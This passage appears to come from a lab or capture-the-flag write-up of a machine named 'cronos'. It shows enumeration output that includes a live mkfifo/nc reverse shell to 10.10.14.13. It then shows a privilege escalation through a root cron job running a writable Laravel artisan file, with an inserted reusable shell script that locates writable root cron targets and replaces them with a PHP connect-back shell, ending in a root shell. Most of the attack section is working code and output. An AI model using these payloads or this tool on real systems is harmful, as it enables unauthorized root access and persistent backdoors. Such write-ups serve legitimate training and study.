root        54  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        55  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        56  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        57  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_0]
root        58  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_0]
root        59  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_1]
root        60  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_1]
root        67  0.0  0.0      0     0 ?        S<   10:48   0:00 [ipv6_addrconf]
root        80  0.0  0.0      0     0 ?        S<   10:48   0:00 [deferwq]
root        81  0.0  0.0      0     0 ?        S<   10:48   0:00 [charger_manager]
root       131  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_2]
root       132  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_2]
root       133  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_3]
root       134  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_3]
root       135  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_4]
root       136  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_5]
root       137  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_4]
root       138  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_5]
root       139  0.0  0.0      0     0 ?        S<   10:48   0:00 [vmw_pvscsi_wq_4]
root       140  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_6]
root       141  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_6]
root       143  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root       144  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_7]
root       147  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_7]
root       150  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_8]
root       151  0.0  0.0      0     0 ?        S<   10:48   0:00 [kpsmoused]
root       154  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_8]
root       157  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_9]
root       160  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_9]
root       162  0.0  0.0      0     0 ?        S<   10:48   0:00 [ttm_swap]
root       164  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_10]
root       167  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_10]
root       168  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_11]
root       170  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_11]
root       177  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_12]
root       178  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_12]
root       179  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_13]
root       180  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_13]
root       184  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_14]
root       186  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_14]
root       189  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_15]
root       191  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_15]
root       192  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_16]
root       195  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_16]
root       196  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_17]
root       198  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_17]
root       199  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_18]
root       201  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_18]
root       204  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_19]
root       206  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_19]
root       208  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_20]
root       211  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_20]
root       212  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_21]
root       214  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_21]
root       216  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_22]
root       218  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_22]
root       220  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_23]
root       222  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_23]
root       223  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_24]
root       224  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_24]
root       225  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_25]
root       226  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_25]
root       227  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_26]
root       228  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_26]
root       229  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_27]
root       230  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_27]
root       231  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_28]
root       232  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_28]
root       233  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_29]
root       234  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_29]
root       235  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_30]
root       236  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_30]
root       237  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_31]
root       238  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_31]
root       239  0.0  0.0      0     0 ?        S    10:48   0:00 [scsi_eh_32]
root       240  0.0  0.0      0     0 ?        S<   10:48   0:00 [scsi_tmf_32]
root       265  0.0  0.0      0     0 ?        S    10:48   0:00 [kworker/u2:28]
root       266  0.0  0.0      0     0 ?        S    10:48   0:00 [kworker/u2:29]
root       339  0.0  0.0      0     0 ?        S<   10:48   0:00 [raid5wq]
root       364  0.0  0.0      0     0 ?        S<   10:48   0:00 [kdmflush]
root       365  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root       375  0.0  0.0      0     0 ?        S<   10:48   0:00 [kdmflush]
root       376  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root       393  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root       421  0.0  0.0      0     0 ?        S    10:48   0:00 [jbd2/dm-0-8]
root       422  0.0  0.0      0     0 ?        S<   10:48   0:00 [ext4-rsv-conver]
root       466  0.0  0.0      0     0 ?        S<   10:48   0:00 [kworker/0:1H]
root       478  0.0  0.0      0     0 ?        S<   10:48   0:00 [iscsi_eh]
root       488  0.0  0.0      0     0 ?        S<   10:48   0:00 [ib_addr]
root       490  0.0  0.3  28500  3180 ?        Ss   10:48   0:00 /lib/systemd/systemd-journald
root       498  0.0  0.0      0     0 ?        S    10:48   0:00 [kauditd]
root       503  0.0  0.0      0     0 ?        S<   10:48   0:00 [ib_mcast]
root       509  0.0  0.0      0     0 ?        S<   10:48   0:00 [ib_nl_sa_wq]
root       513  0.0  0.0      0     0 ?        S<   10:48   0:00 [ib_cm]
root       514  0.0  0.0      0     0 ?        S<   10:48   0:00 [iw_cm_wq]
root       515  0.0  0.1 102968  1536 ?        Ss   10:48   0:00 /sbin/lvmetad -f
root       517  0.0  0.0      0     0 ?        S<   10:48   0:00 [rdma_cm]
root       540  0.0  0.3  44700  4040 ?        Ss   10:48   0:00 /lib/systemd/systemd-udevd
root       782  0.0  0.0      0     0 ?        S<   10:48   0:00 [ext4-rsv-conver]
systemd+   819  0.0  0.2 100324  2264 ?        Ssl  10:48   0:00 /lib/systemd/systemd-timesyncd
message+   929  0.0  0.3  42940  3896 ?        Ss   10:48   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root       951  0.0  0.2  29008  2756 ?        Ss   10:48   0:00 /usr/sbin/cron -f
root       952  0.0  0.5 275860  6056 ?        Ssl  10:48   0:00 /usr/lib/accountsservice/accounts-daemon
root       953  0.0  0.1  95368  1392 ?        Ssl  10:48   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog     954  0.0  0.3 256396  3268 ?        Ssl  10:48   0:00 /usr/sbin/rsyslogd -n
daemon     957  0.0  0.2  26044  2068 ?        Ss   10:48   0:00 /usr/sbin/atd -f
root       963  0.0  1.9 266532 20288 ?        Ssl  10:48   0:00 /usr/lib/snapd/snapd
root       967  0.0  0.1  20100  1128 ?        Ss   10:48   0:00 /lib/systemd/systemd-logind
root       969  0.1  1.0 192236 10196 ?        Ssl  10:48   0:01 /usr/bin/vmtoolsd
root       989  0.0  0.1   4400  1292 ?        Ss   10:48   0:00 /usr/sbin/acpid
root      1036  0.0  0.0  13376   152 ?        Ss   10:48   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1037  0.0  0.5 277180  5924 ?        Ssl  10:48   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1190  0.0  0.5  65520  5828 ?        Ss   10:48   0:00 /usr/sbin/sshd -D
bind      1191  0.0  1.9 208376 19556 ?        Ssl  10:48   0:00 /usr/sbin/named -f -u bind -4
root      1217  0.0  0.0   5224   140 ?        Ss   10:48   0:00 /sbin/iscsid
root      1218  0.0  0.3   5724  3516 ?        S<Ls 10:48   0:00 /sbin/iscsid
mysql     1225  0.2 16.9 1132928 172456 ?      Ssl  10:48   0:03 /usr/sbin/mysqld
root      1290  0.0  0.1  15940  1540 tty1     Ss+  10:48   0:00 /sbin/agetty --noclear tty1 linux
root      1321  0.0  2.4 325588 24664 ?        Ss   10:48   0:00 /usr/sbin/apache2 -k start
www-data  1345  0.0  1.7 326368 18004 ?        S    10:48   0:00 /usr/sbin/apache2 -k start
www-data  1403  0.0  1.0 326160 10876 ?        S    10:49   0:00 /usr/sbin/apache2 -k start
root      1495  0.0  0.0      0     0 ?        S    10:54   0:00 [kworker/0:1]
www-data  3652  0.0  1.0 326160 10964 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
www-data  3661  0.0  1.6 326368 17036 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
www-data  3679  0.0  1.0 326160 10964 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
www-data  3685  0.0  1.7 326364 18080 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
www-data  3717  0.0  1.0 326160 10956 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
www-data  3725  0.0  1.1 326160 12192 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
www-data  3729  0.0  1.0 326160 11096 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
www-data  3736  0.0  1.0 326160 10956 ?        S    10:57   0:00 /usr/sbin/apache2 -k start
root      3832  0.0  0.0      0     0 ?        S    11:03   0:00 [kworker/0:0]
www-data  3992  0.0  0.0   4508   780 ?        S    11:12   0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.13 445 >/tmp/f 
www-data  3995  0.0  0.0   4536   724 ?        S    11:12   0:00 cat /tmp/f
www-data  3996  0.0  0.3  18216  3304 ?        S    11:12   0:00 /bin/bash -i
www-data  3997  0.0  0.1  11304  1656 ?        S    11:12   0:00 nc 10.10.14.13 445
www-data  4020  0.0  0.3  19028  4024 ?        S    11:14   0:00 /bin/bash ./linenum.sh
www-data  4021  0.0  0.3  19072  3528 ?        S    11:14   0:00 /bin/bash ./linenum.sh
www-data  4022  0.0  0.0   4384   672 ?        S    11:14   0:00 tee -a
www-data  4223  0.0  0.2  19056  2828 ?        S    11:15   0:00 /bin/bash ./linenum.sh
www-data  4224  0.0  0.2  34424  3000 ?        R    11:15   0:00 ps aux

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16

[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.7.17, for Linux (x86_64) using  EditLine wrapper

[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built:   2016-07-14T12:32:26

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php7_module (shared)
 setenvif_module (shared)
 status_module (shared)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1667 Apr  9  2017 /etc/passwd
-rw-r--r-- 1 root root 832 Apr  9  2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1191 Apr  9  2017 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16  2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16  2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29  2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar  7  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29  2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29  2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29  2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29  2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15  2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29  2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29  2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29  2016 /usr/bin/passwd

[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16  2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16  2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb  7  2016 /usr/bin/screen
-rwxr-sr-x 1 root ssh 358624 Aug 11  2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 Mar 29  2016 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr  6  2016 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51464 Jan 15  2016 /usr/bin/at
-rwxr-sr-x 1 root tty 27368 Dec 16  2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 Mar 29  2016 /usr/bin/expiry

[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 4781 Mar 17  2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7788 Mar 22  2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 338 Nov 18  2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 100 Nov 25  2015 /etc/sos.conf
-rw-r--r-- 1 root root 1371 Jan 28  2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 350 Mar 22  2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2084 Sep  6  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 6816 Nov 30  2016 /etc/overlayroot.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 3028 Feb 15  2017 /etc/adduser.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 191 Jan 19  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 14867 Apr 12  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf
-rw-r--r-- 1 root root 703 May  6  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Mar 22  2017 /etc/kernel-img.conf

Exploitation

During our post-exploitation enumeration we saw the following cronjob running under the context of root: php /var/www/laravel/artisan

The ls output below shows that artisan is owned by www-data, the user our web shell runs as, and is writable by that owner. Whatever we write into that file will therefore be executed as root the next time the cron job fires, which makes it a viable privilege-escalation vector.

www-data@cronos:/var/www/laravel$ ls -la artisan 
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 artisan

We create a reverse shell written in PHP, serve it from our machine and download it onto the target in place of /var/www/laravel/artisan (the GET /artisan entry in the web server log below is that download), start a listener on the port the payload connects back to, and wait for cron to run the job again.
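The step above as an added example, not code from the original write-up: a set of POSIX shell helpers that first lists which root cron entries reference an existing file the current user can write (the general check, of which artisan is one instance), then backs the target up and overwrites it in place with a PHP connect-back shell, and finally restores the original once the root shell is in hand. The /etc/crontab-style input, the attacker host and port, and the `fsockopen()`/`proc_open()` PHP payload are assumptions; the write-up does not show the payload it used.

```shell
#!/bin/sh
# Added example (not from the original write-up): find root cron jobs whose
# target script is writable by us, plant a PHP reverse shell in its place, and
# keep a backup so the original can be restored after the engagement.
# Assumptions (not in the write-up): /etc/crontab-style input with a user
# field, attacker host/port supplied by the caller, PHP payload built on
# fsockopen()/proc_open().

# Print "user path" for every crontab entry whose command references an
# existing regular file that the current user can write.
# Usage: writable_cron_targets /etc/crontab
writable_cron_targets() {
    wct_file="$1"
    # /etc/crontab fields: minute hour dom month dow user command...
    grep -v '^[[:space:]]*#' "$wct_file" | grep -v '^[[:space:]]*$' |
    while read -r wct_min wct_hour wct_dom wct_mon wct_dow wct_user wct_cmd; do
        # skip environment assignments such as PATH=/usr/bin:/bin
        case "$wct_min" in *=*) continue ;; esac
        for wct_word in $wct_cmd; do
            # only absolute paths to regular files we can write are interesting
            case "$wct_word" in /*) ;; *) continue ;; esac
            if [ -f "$wct_word" ] && [ -w "$wct_word" ]; then
                printf '%s %s\n' "$wct_user" "$wct_word"
            fi
        done
    done
}

# Back up the cron target and overwrite it in place (ownership and mode are
# kept) with a PHP reverse shell that connects back to LHOST:LPORT. The cron
# job, running as root, executes it on its next scheduled run.
# Usage: stage_payload /var/www/laravel/artisan 10.10.14.13 445
stage_payload() {
    sp_target="$1"; sp_lhost="$2"; sp_lport="$3"
    if [ ! -w "$sp_target" ]; then
        printf 'not writable: %s\n' "$sp_target" >&2
        return 1
    fi
    # keep the original so the application can be put back afterwards
    [ -e "$sp_target.bak" ] || cp -p "$sp_target" "$sp_target.bak"
    # quoted heredoc: the shell expands nothing; sed fills in host and port
    sed -e "s/__LHOST__/$sp_lhost/" -e "s/__LPORT__/$sp_lport/" > "$sp_target" <<'EOF'
<?php
// fsockopen() connects back to the listener; proc_open() hands the socket to
// bash as stdin, stdout and stderr, so the listener gets an interactive shell
$sock = fsockopen('__LHOST__', __LPORT__);
if ($sock === false) {
    exit(1);
}
$proc = proc_open('/bin/bash -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
if (is_resource($proc)) {
    proc_close($proc);
}
EOF
}

# Put the original file back once the root shell has been obtained.
# Usage: restore_target /var/www/laravel/artisan
restore_target() {
    rt_target="$1"
    [ -f "$rt_target.bak" ] || return 1
    mv "$rt_target.bak" "$rt_target"
}
```

Two practical points: start the listener (`nc -nlvp 445` in the write-up) before staging the payload, because the shell arrives on the next cron tick and a missed connection simply dies; and restore the original as soon as the root shell is in hand, since overwriting artisan breaks every Laravel console command and the backup is the only clean way back.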

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.13 - - [06/May/2023 10:23:28] "GET /artisan HTTP/1.1" 200 -
nc -nlvp 445                             
listening on [any] 445 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 11:24:01 up 35 min,  0 users,  load average: 0.00, 0.01, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
bash: cannot set terminal process group (4626): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:/# whoami
whoami
root
root@cronos:/#